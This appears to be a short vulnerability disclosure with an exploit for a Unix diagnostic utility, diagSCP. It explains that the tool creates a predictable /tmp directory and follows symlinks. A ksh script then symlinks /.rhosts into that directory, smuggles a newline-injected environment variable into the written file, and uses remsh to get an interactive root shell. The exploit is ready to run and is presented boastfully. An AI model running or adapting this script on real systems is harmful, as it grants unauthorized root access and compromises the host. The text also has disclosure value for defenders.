BUG1 : diagSCP Synopsis ======== The diagSCP utility creates a temporary directory in /tmp with a predictable name. It will also happily follow any evil symlink you put in. The 'env' file created by diagSCP in this directory contains the user's environment and is thus subject to customization. We just have to insert some ^J in a variable to have it go to the next line, so it looks like a valid entry in .rhosts Exploit ======= #!/bin/ksh FILE=/.rhosts NEXT=`expr $$ + 5` mkdir /tmp/diagSCP.$NEXT ln -s $FILE /tmp/diagSCP.$NEXT/env export GUESSWHAT=" localhost `whoami`" diagSCP & sleep 2 kill $NEXT echo "\nFrench kiss ? root kiss !\n" remsh localhost -l root ksh -i